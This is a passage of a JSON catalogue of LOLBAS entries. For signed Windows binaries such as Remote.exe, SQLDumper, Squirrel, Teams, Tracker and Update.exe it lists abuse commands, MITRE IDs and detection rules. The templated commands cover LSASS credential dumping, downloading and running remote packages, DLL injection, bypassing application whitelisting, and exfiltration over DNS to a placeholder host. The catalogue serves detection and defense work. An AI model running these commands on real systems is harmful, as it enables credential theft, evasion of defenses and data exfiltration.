spawns"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/197615345b927682ab7ad7fa3c5f5bb2ed911eed/rules/windows/process_creation/proc_creation_win_lolbin_remote.yml"}],"references":["https://blog.thecybersecuritytutor.com/Exeuction-AWL-Bypass-Remote-exe-LOLBin/","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Remote/"]},{"id":"lolbas:remote-exe:1","toolId":"lolbas:remote-exe","toolName":"Remote.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"Remote.exe /s {PATH:.exe} anythinghere","description":"Spawns specified executable as a child process of remote.exe","usecase":"Executes a process under a trusted Microsoft signed binary","mitre":["T1127"],"privilege":"user","fullPath":["C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\x64\\remote.exe","C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\x86\\remote.exe"],"toolType":"OtherMSBinary","detection":[{"type":"IOC","value":"remote.exe process spawns"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/197615345b927682ab7ad7fa3c5f5bb2ed911eed/rules/windows/process_creation/proc_creation_win_lolbin_remote.yml"}],"references":["https://blog.thecybersecuritytutor.com/Exeuction-AWL-Bypass-Remote-exe-LOLBin/","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Remote/"]},{"id":"lolbas:remote-exe:2","toolId":"lolbas:remote-exe","toolName":"Remote.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"Remote.exe /s {PATH_SMB:.exe} anythinghere","description":"Run a remote file","usecase":"Executing a remote binary without saving file to disk","mitre":["T1127"],"privilege":"user","fullPath":["C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\x64\\remote.exe","C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\x86\\remote.exe"],"toolType":"OtherMSBinary","detection":[{"type":"IOC","value":"remote.exe process spawns"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/197615345b927682ab7ad7fa3c5f5bb2ed911eed/rules/windows/process_creation/proc_creation_win_lolbin_remote.yml"}],"references":["https://blog.thecybersecuritytutor.com/Exeuction-AWL-Bypass-Remote-exe-LOLBin/","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Remote/"]},{"id":"lolbas:sqldumper-exe:0","toolId":"lolbas:sqldumper-exe","toolName":"Sqldumper.exe","name":"Dump","source":"LOLBAS","platform":["Windows"],"capability":["Credential Access"],"nativeCategory":["Dump"],"command":"sqldumper.exe 464 0 0x0110","description":"Dump process by PID and create a dump file (Appears to create a dump file called SQLDmprXXXX.mdmp).","usecase":"Dump process using PID.","mitre":["T1003"],"privilege":"admin","fullPath":["C:\\Program Files\\Microsoft SQL Server\\90\\Shared\\SQLDumper.exe","C:\\Program Files (x86)\\Microsoft Office\\root\\vfs\\ProgramFilesX86\\Microsoft Analysis\\AS OLEDB\\140\\SQLDumper.exe","C:\\Program Files\\Microsoft Power BI Desktop\\bin\\SqlDumper.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_susp_sqldumper_activity.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/f6421d8c534f295518a2c945f530e8afc4c8ad1b/rules/windows/credential_access_lsass_memdump_file_created.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/5bdf70e72c6cd4547624c521108189af994af449/rules/windows/credential_access_cmdline_dump_tool.toml"}],"references":["https://twitter.com/countuponsec/status/910969424215232518","https://twitter.com/countuponsec/status/910977826853068800","https://support.microsoft.com/en-us/help/917825/how-to-use-the-sqldumper-exe-utility-to-generate-a-dump-file-in-sql-se","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Sqldumper/"]},{"id":"lolbas:sqldumper-exe:1","toolId":"lolbas:sqldumper-exe","toolName":"Sqldumper.exe","name":"Dump","source":"LOLBAS","platform":["Windows"],"capability":["Credential Access"],"nativeCategory":["Dump"],"command":"sqldumper.exe 540 0 0x01100:40","description":"0x01100:40 flag will create a Mimikatz compatible dump file.","usecase":"Dump LSASS.exe to Mimikatz compatible dump using PID.","mitre":["T1003.001"],"privilege":"admin","fullPath":["C:\\Program Files\\Microsoft SQL Server\\90\\Shared\\SQLDumper.exe","C:\\Program Files (x86)\\Microsoft Office\\root\\vfs\\ProgramFilesX86\\Microsoft Analysis\\AS OLEDB\\140\\SQLDumper.exe","C:\\Program Files\\Microsoft Power BI Desktop\\bin\\SqlDumper.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_susp_sqldumper_activity.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/f6421d8c534f295518a2c945f530e8afc4c8ad1b/rules/windows/credential_access_lsass_memdump_file_created.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/5bdf70e72c6cd4547624c521108189af994af449/rules/windows/credential_access_cmdline_dump_tool.toml"}],"references":["https://twitter.com/countuponsec/status/910969424215232518","https://twitter.com/countuponsec/status/910977826853068800","https://support.microsoft.com/en-us/help/917825/how-to-use-the-sqldumper-exe-utility-to-generate-a-dump-file-in-sql-se","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Sqldumper/"]},{"id":"lolbas:sqlps-exe:0","toolId":"lolbas:sqlps-exe","toolName":"Sqlps.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"Sqlps.exe -noprofile","description":"Run a SQL Server PowerShell mini-console without Module and ScriptBlock Logging.","usecase":"Execute PowerShell commands without ScriptBlock logging.","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Program files (x86)\\Microsoft SQL Server\\100\\Tools\\Binn\\sqlps.exe","C:\\Program files (x86)\\Microsoft SQL Server\\110\\Tools\\Binn\\sqlps.exe","C:\\Program files (x86)\\Microsoft SQL Server\\120\\Tools\\Binn\\sqlps.exe","C:\\Program files (x86)\\Microsoft SQL Server\\130\\Tools\\Binn\\sqlps.exe","C:\\Program Files (x86)\\Microsoft SQL Server\\150\\Tools\\Binn\\SQLPS.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_mssql_sqlps_susp_execution.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/image_load/image_load_dll_system_management_automation_susp_load.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/5bdf70e72c6cd4547624c521108189af994af449/rules/windows/execution_suspicious_powershell_imgload.toml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/aa9f7e0d13a61626c69367290ed1b7b71d1281fd/docs/_posts/2021-10-05-suspicious_copy_on_system32.md"}],"references":["https://twitter.com/ManuelBerrueta/status/1527289261350760455","https://twitter.com/bryon_/status/975835709587075072","https://docs.microsoft.com/en-us/sql/powershell/sql-server-powershell?view=sql-server-2017","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Sqlps/"]},{"id":"lolbas:sqltoolsps-exe:0","toolId":"lolbas:sqltoolsps-exe","toolName":"SQLToolsPS.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"SQLToolsPS.exe -noprofile -command Start-Process {PATH:.exe}","description":"Run a SQL Server PowerShell mini-console without Module and ScriptBlock Logging.","usecase":"Execute PowerShell command.","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Program files (x86)\\Microsoft SQL Server\\130\\Tools\\Binn\\sqlps.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_mssql_sqltoolsps_susp_execution.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/aa9f7e0d13a61626c69367290ed1b7b71d1281fd/docs/_posts/2021-10-05-suspicious_copy_on_system32.md"}],"references":["https://twitter.com/pabraeken/status/993298228840992768","https://docs.microsoft.com/en-us/sql/powershell/sql-server-powershell?view=sql-server-2017","https://lolbas-project.github.io/lolbas/OtherMSBinaries/SQLToolsPS/"]},{"id":"lolbas:squirrel-exe:0","toolId":"lolbas:squirrel-exe","toolName":"Squirrel.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"squirrel.exe --download {REMOTEURL}","description":"The above binary will go to url and look for RELEASES file and download the nuget package.","usecase":"Download binary","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Users\\<username>\\AppData\\Local\\Microsoft\\Teams\\current\\Squirrel.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_squirrel.yml"}],"references":["https://www.youtube.com/watch?v=rOP3hnkj7ls","https://twitter.com/reegun21/status/1144182772623269889","http://www.hexacorn.com/blog/2018/08/16/squirrel-as-a-lolbin/","https://medium.com/@reegun/nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-80c9df51cf12","https://medium.com/@reegun/update-nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-b55295144b56","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Squirrel/"]},{"id":"lolbas:squirrel-exe:1","toolId":"lolbas:squirrel-exe","toolName":"Squirrel.exe","name":"AWL Bypass","source":"LOLBAS","platform":["Windows"],"capability":["AWL / Policy Bypass"],"nativeCategory":["AWL Bypass"],"command":"squirrel.exe --update {REMOTEURL}","description":"The above binary will go to url and look for RELEASES file, download and install the nuget package.","usecase":"Download and execute binary","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Users\\<username>\\AppData\\Local\\Microsoft\\Teams\\current\\Squirrel.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_squirrel.yml"}],"references":["https://www.youtube.com/watch?v=rOP3hnkj7ls","https://twitter.com/reegun21/status/1144182772623269889","http://www.hexacorn.com/blog/2018/08/16/squirrel-as-a-lolbin/","https://medium.com/@reegun/nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-80c9df51cf12","https://medium.com/@reegun/update-nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-b55295144b56","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Squirrel/"]},{"id":"lolbas:squirrel-exe:2","toolId":"lolbas:squirrel-exe","toolName":"Squirrel.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"squirrel.exe --update {REMOTEURL}","description":"The above binary will go to url and look for RELEASES file, download and install the nuget package.","usecase":"Download and execute binary","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Users\\<username>\\AppData\\Local\\Microsoft\\Teams\\current\\Squirrel.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_squirrel.yml"}],"references":["https://www.youtube.com/watch?v=rOP3hnkj7ls","https://twitter.com/reegun21/status/1144182772623269889","http://www.hexacorn.com/blog/2018/08/16/squirrel-as-a-lolbin/","https://medium.com/@reegun/nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-80c9df51cf12","https://medium.com/@reegun/update-nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-b55295144b56","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Squirrel/"]},{"id":"lolbas:squirrel-exe:3","toolId":"lolbas:squirrel-exe","toolName":"Squirrel.exe","name":"AWL Bypass","source":"LOLBAS","platform":["Windows"],"capability":["AWL / Policy Bypass"],"nativeCategory":["AWL Bypass"],"command":"squirrel.exe --updateRollback={REMOTEURL}","description":"The above binary will go to url and look for RELEASES file, download and install the nuget package.","usecase":"Download and execute binary","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Users\\<username>\\AppData\\Local\\Microsoft\\Teams\\current\\Squirrel.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_squirrel.yml"}],"references":["https://www.youtube.com/watch?v=rOP3hnkj7ls","https://twitter.com/reegun21/status/1144182772623269889","http://www.hexacorn.com/blog/2018/08/16/squirrel-as-a-lolbin/","https://medium.com/@reegun/nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-80c9df51cf12","https://medium.com/@reegun/update-nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-b55295144b56","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Squirrel/"]},{"id":"lolbas:squirrel-exe:4","toolId":"lolbas:squirrel-exe","toolName":"Squirrel.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"squirrel.exe --updateRollback={REMOTEURL}","description":"The above binary will go to url and look for RELEASES file, download and install the nuget package.","usecase":"Download and execute binary","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Users\\<username>\\AppData\\Local\\Microsoft\\Teams\\current\\Squirrel.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_squirrel.yml"}],"references":["https://www.youtube.com/watch?v=rOP3hnkj7ls","https://twitter.com/reegun21/status/1144182772623269889","http://www.hexacorn.com/blog/2018/08/16/squirrel-as-a-lolbin/","https://medium.com/@reegun/nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-80c9df51cf12","https://medium.com/@reegun/update-nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-b55295144b56","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Squirrel/"]},{"id":"lolbas:te-exe:0","toolId":"lolbas:te-exe","toolName":"te.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"te.exe {PATH:.wsc}","description":"Run COM Scriptlets (e.g. VBScript) by calling a Windows Script Component (WSC) file.","usecase":"Execute Visual Basic script stored in local Windows Script Component file.","mitre":["T1127"],"privilege":"user","fullPath":["no default"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_susp_use_of_te_bin.yml"}],"references":["https://twitter.com/gn3mes1s/status/927680266390384640","https://github.com/LOLBAS-Project/LOLBAS/pull/359","https://learn.microsoft.com/en-us/windows-hardware/drivers/taef/authoring-tests","https://lolbas-project.github.io/lolbas/OtherMSBinaries/te/"]},{"id":"lolbas:te-exe:1","toolId":"lolbas:te-exe","toolName":"te.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"te.exe {PATH:.dll}","description":"Execute commands from a DLL file with Test Authoring and Execution Framework (TAEF) tests. See resources section for required structures.","usecase":"Execute DLL file.","mitre":["T1127"],"privilege":"user","fullPath":["no default"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_susp_use_of_te_bin.yml"}],"references":["https://twitter.com/gn3mes1s/status/927680266390384640","https://github.com/LOLBAS-Project/LOLBAS/pull/359","https://learn.microsoft.com/en-us/windows-hardware/drivers/taef/authoring-tests","https://lolbas-project.github.io/lolbas/OtherMSBinaries/te/"]},{"id":"lolbas:teams-exe:0","toolId":"lolbas:teams-exe","toolName":"Teams.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"teams.exe","description":"Generate JavaScript payload and package.json, and save to \"%LOCALAPPDATA%\\\\Microsoft\\\\Teams\\\\current\\\\app\\\\\" before executing.","usecase":"Execute JavaScript code","mitre":["T1218.015"],"privilege":"user","fullPath":["C:\\Users\\<username>\\AppData\\Local\\Microsoft\\Teams\\current\\Teams.exe"],"toolType":"OtherMSBinary","detection":[{"type":"IOC","value":"%LOCALAPPDATA%\\Microsoft\\Teams\\current\\app directory created"},{"type":"IOC","value":"%LOCALAPPDATA%\\Microsoft\\Teams\\current\\app.asar file created/modified by non-Teams installer/updater"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/process_creation/proc_creation_win_susp_electron_exeuction_proxy.yml"}],"references":["https://l--k.uk/2022/01/16/microsoft-teams-and-other-electron-apps-as-lolbins/","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Teams/"]},{"id":"lolbas:teams-exe:1","toolId":"lolbas:teams-exe","toolName":"Teams.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"teams.exe","description":"Generate JavaScript payload and package.json, archive in ASAR file and save to \"%LOCALAPPDATA%\\\\Microsoft\\\\Teams\\\\current\\\\app.asar\" before executing.","usecase":"Execute JavaScript code","mitre":["T1218.015"],"privilege":"user","fullPath":["C:\\Users\\<username>\\AppData\\Local\\Microsoft\\Teams\\current\\Teams.exe"],"toolType":"OtherMSBinary","detection":[{"type":"IOC","value":"%LOCALAPPDATA%\\Microsoft\\Teams\\current\\app directory created"},{"type":"IOC","value":"%LOCALAPPDATA%\\Microsoft\\Teams\\current\\app.asar file created/modified by non-Teams installer/updater"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/process_creation/proc_creation_win_susp_electron_exeuction_proxy.yml"}],"references":["https://l--k.uk/2022/01/16/microsoft-teams-and-other-electron-apps-as-lolbins/","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Teams/"]},{"id":"lolbas:teams-exe:2","toolId":"lolbas:teams-exe","toolName":"Teams.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"teams.exe --disable-gpu-sandbox --gpu-launcher=\"{CMD} &&\"","description":"Teams spawns cmd.exe as a child process of teams.exe and executes the ping command","usecase":"Executes a process under a trusted Microsoft signed binary","mitre":["T1218.015"],"privilege":"user","fullPath":["C:\\Users\\<username>\\AppData\\Local\\Microsoft\\Teams\\current\\Teams.exe"],"toolType":"OtherMSBinary","detection":[{"type":"IOC","value":"%LOCALAPPDATA%\\Microsoft\\Teams\\current\\app directory created"},{"type":"IOC","value":"%LOCALAPPDATA%\\Microsoft\\Teams\\current\\app.asar file created/modified by non-Teams installer/updater"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/process_creation/proc_creation_win_susp_electron_exeuction_proxy.yml"}],"references":["https://l--k.uk/2022/01/16/microsoft-teams-and-other-electron-apps-as-lolbins/","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Teams/"]},{"id":"lolbas:testwindowremoteagent-exe:0","toolId":"lolbas:testwindowremoteagent-exe","toolName":"TestWindowRemoteAgent.exe","name":"Upload","source":"LOLBAS","platform":["Windows"],"capability":["File Upload"],"nativeCategory":["Upload"],"command":"TestWindowRemoteAgent.exe start -h {your-base64-data}.example.com -p 8000","description":"Sends DNS query for open connection to any host, enabling exfiltration over DNS","usecase":"Attackers may utilize this to exfiltrate data over DNS","mitre":["T1048"],"privilege":"user","fullPath":["C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\Common7\\IDE\\CommonExtensions\\Microsoft\\TestWindow\\RemoteAgent\\TestWindowRemoteAgent.exe"],"toolType":"OtherMSBinary","detection":[{"type":"IOC","value":"TestWindowRemoteAgent.exe spawning unexpectedly"}],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/TestWindowRemoteAgent/"]},{"id":"lolbas:tracker-exe:0","toolId":"lolbas:tracker-exe","toolName":"Tracker.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"Tracker.exe /d {PATH:.dll} /c C:\\Windows\\write.exe","description":"Use tracker.exe to proxy execution of an arbitrary DLL into another process. Since tracker.exe is also signed it can be used to bypass application whitelisting solutions.","usecase":"Injection of locally stored DLL file into target process.","mitre":["T1127"],"privilege":"user","fullPath":["no default"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_tracker.yml"}],"references":["https://twitter.com/subTee/status/793151392185589760","https://attack.mitre.org/wiki/Execution","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Tracker/"]},{"id":"lolbas:tracker-exe:1","toolId":"lolbas:tracker-exe","toolName":"Tracker.exe","name":"AWL Bypass","source":"LOLBAS","platform":["Windows"],"capability":["AWL / Policy Bypass"],"nativeCategory":["AWL Bypass"],"command":"Tracker.exe /d {PATH:.dll} /c C:\\Windows\\write.exe","description":"Use tracker.exe to proxy execution of an arbitrary DLL into another process. Since tracker.exe is also signed it can be used to bypass application whitelisting solutions.","usecase":"Injection of locally stored DLL file into target process.","mitre":["T1127"],"privilege":"user","fullPath":["no default"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_tracker.yml"}],"references":["https://twitter.com/subTee/status/793151392185589760","https://attack.mitre.org/wiki/Execution","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Tracker/"]},{"id":"lolbas:update-exe:0","toolId":"lolbas:update-exe","toolName":"Update.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"Update.exe --download {REMOTEURL}","description":"The above binary will go to url and look for RELEASES file and download the nuget package.","usecase":"Download binary","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Users\\<username>\\AppData\\Local\\Microsoft\\Teams\\update.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_squirrel.yml"},{"type":"IOC","value":"Update.exe spawned an unknown process"}],"references":["https://www.youtube.com/watch?v=rOP3hnkj7ls","https://twitter.com/reegun21/status/1144182772623269889","https://twitter.com/MrUn1k0d3r/status/1143928885211537408","https://twitter.com/reegun21/status/1291005287034281990","http://www.hexacorn.com/blog/2018/08/16/squirrel-as-a-lolbin/","https://medium.com/@reegun/nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-80c9df51cf12","https://medium.com/@reegun/update-nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-b55295144b56","https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/microsoft-teams-updater-living-off-the-land/","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Update/"]},{"id":"lolbas:update-exe:1","toolId":"lolbas:update-exe","toolName":"Update.exe","name":"AWL Bypass","source":"LOLBAS","platform":["Windows"],"capability":["AWL / Policy Bypass"],"nativeCategory":["AWL Bypass"],"command":"Update.exe --update={REMOTEURL}","description":"The above binary will go to url and look for RELEASES file, download and install the nuget package.","usecase":"Download and execute binary","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Users\\<username>\\AppData\\Local\\Microsoft\\Teams\\update.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_squirrel.yml"},{"type":"IOC","value":"Update.exe spawned an unknown process"}],"references":["https://www.youtube.com/watch?v=rOP3hnkj7ls","https://twitter.com/reegun21/status/1144182772623269889","https://twitter.com/MrUn1k0d3r/status/1143928885211537408","https://twitter.com/reegun21/status/1291005287034281990","http://www.hexacorn.com/blog/2018/08/16/squirrel-as-a-lolbin/","https://medium.com/@reegun/nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-80c9df51cf12","https://medium.com/@reegun/update-nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-b55295144b56","https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/microsoft-teams-updater-living-off-the-land/","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Update/"]},{"id":"lolbas:update-exe:2","toolId":"lolbas:update-exe","toolName":"Update.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"Update.exe --update={REMOTEURL}","description":"The above binary will go to url and look for RELEASES file, download and install the nuget package.","usecase":"Download and execute binary","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Users\\<username>\\AppData\\Local\\Microsoft\\Teams\\update.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_squirrel.yml"},{"type":"IOC","value":"Update.exe spawned an unknown process"}],"references":["https://www.youtube.com/watch?v=rOP3hnkj7ls","https://twitter.com/reegun21/status/1144182772623269889","https://twitter.com/MrUn1k0d3r/status/1143928885211537408","https://twitter.com/reegun21/status/1291005287034281990","http://www.hexacorn.com/blog/2018/08/16/squirrel-as-a-lolbin/","https://medium.com/@reegun/nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-80c9df51cf12","https://medium.com/@reegun/update-nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-b55295144b56","https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/microsoft-teams-updater-living-off-the-land/","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Update/"]},{"id":"lolbas:update-exe:3","toolId":"lolbas:update-exe","toolName":"Update.exe","name":"AWL Bypass","source":"LOLBAS","platform":["Windows"],"capability":["AWL / Policy Bypass"],"nativeCategory":["AWL Bypass"],"command":"Update.exe --update={PATH_SMB:folder}","description":"The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA.","usecase":"Download and execute binary","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Users\\<username>\\AppData\\Local\\Microsoft\\Teams\\update.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_squirrel.yml"},{"type":"IOC","value":"Update.exe spawned an unknown process"}],"references":["https://www.youtube.com/watch?v=rOP3hnkj7ls","https://twitter.com/reegun21/status/1144182772623269889","https://twitter.com/MrUn1k0d3r/status/1143928885211537408","https://twitter.com/reegun21/status/1291005287034281990","http://www.hexacorn.com/blog/2018/08/16/squirrel-as-a-lolbin/","https://medium.com/@reegun/nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-80c9df51cf12","https://medium.com/@reegun/update-nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-b55295144b56","https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/microsoft-teams-updater-living-off-the-land/","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Update/"]},{"id":"lolbas:update-exe:4","toolId":"lolbas:update-exe","toolName":"Update.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"Update.exe --update={PATH_SMB:folder}","description":"The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA.","usecase":"Download and execute binary","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Users\\<username>\\AppData\\Local\\Microsoft\\Teams\\update.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_squirrel.yml"},{"type":"IOC","value":"Update.exe spawned an unknown process"}],"references":["https://www.youtube.com/watch?v=rOP3hnkj7ls","https://twitter.com/reegun21/status/1144182772623269889","https://twitter.com/MrUn1k0d3r/status/1143928885211537408","https://twitter.com/reegun21/status/1291005287034281990","http://www.hexacorn.com/blog/2018/08/16/squirrel-as-a-lolbin/","https://medium.com/@reegun/nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-80c9df51cf12","https://medium.com/@reegun/update-nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-b55295144b56","https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/microsoft-teams-updater-living-off-the-land/","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Update/"]},{"id":"lolbas:update-exe:5","toolId":"lolbas:update-exe","toolName":"Update.exe","name":"AWL Bypass","source":"LOLBAS","platform":["Windows"],"capability":["AWL / Policy Bypass"],"nativeCategory":["AWL 